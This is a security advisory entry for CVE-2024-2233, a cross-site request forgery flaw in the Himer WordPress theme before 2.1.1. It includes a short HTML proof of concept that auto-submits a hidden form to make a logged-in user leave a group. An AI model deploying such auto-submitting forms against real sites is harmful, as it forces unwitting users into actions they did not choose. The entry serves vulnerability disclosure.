Himer – Social Questions and Answers < 2.1.1 – Multiple CSRF on the Group Section | CVE 2024-2233 | Theme Vulnerabilities

Description

The theme does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. These include declining and accepting group invitations or leaving a group

Proof of Concept

Make a logged in user open an HTML file such as:

```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpqa&#95;leave&#95;group" />
      <input type="hidden" name="group&#95;id" value="6670" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Affects Themes

Fixed in 2.1.1

References

CVE

YouTube Video

YouTube Video

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Sushmita Poudel

Submitter

Sushmita Poudel

Submitter website

https://susmitapoudel.com.np

Submitter twitter

poudelsushmita1

Verified

Yes

WPVDB ID

51d0311a-673b-4538-9427-a48e8c89e38b

Timeline

Publicly Published

2024-06-12 (about 1 year ago)

Added

2024-06-12 (about 1 year ago)

Last Updated

2024-06-12 (about 1 year ago)

Other

Published

Title

Published

2023-12-27

Title

Quiz And Survey Master < 8.1.19 - Quiz Results Deletion via CSRF

Published

2020-07-22

Title

Social Sharing Plugin < 1.2.10 - Cross-Site Request Forgery in Settings

Published

2025-01-16

Title

Better Protected Pages <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-10-14

Title

ProfileGrid < 5.9.3.1 - Cross-Site Request Forgery

Published

2014-08-01

Title

Easy AdSense Lite 6.06 - Setting Manipulation CSRF